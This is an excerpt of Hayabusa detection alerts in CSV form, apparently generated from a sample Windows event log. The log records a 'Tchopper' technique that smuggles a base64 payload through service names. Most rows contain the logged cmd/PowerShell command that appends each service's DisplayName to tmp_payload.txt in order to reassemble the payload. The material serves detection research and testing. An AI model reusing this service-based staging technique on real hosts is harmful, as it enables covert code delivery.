2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c 
powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append 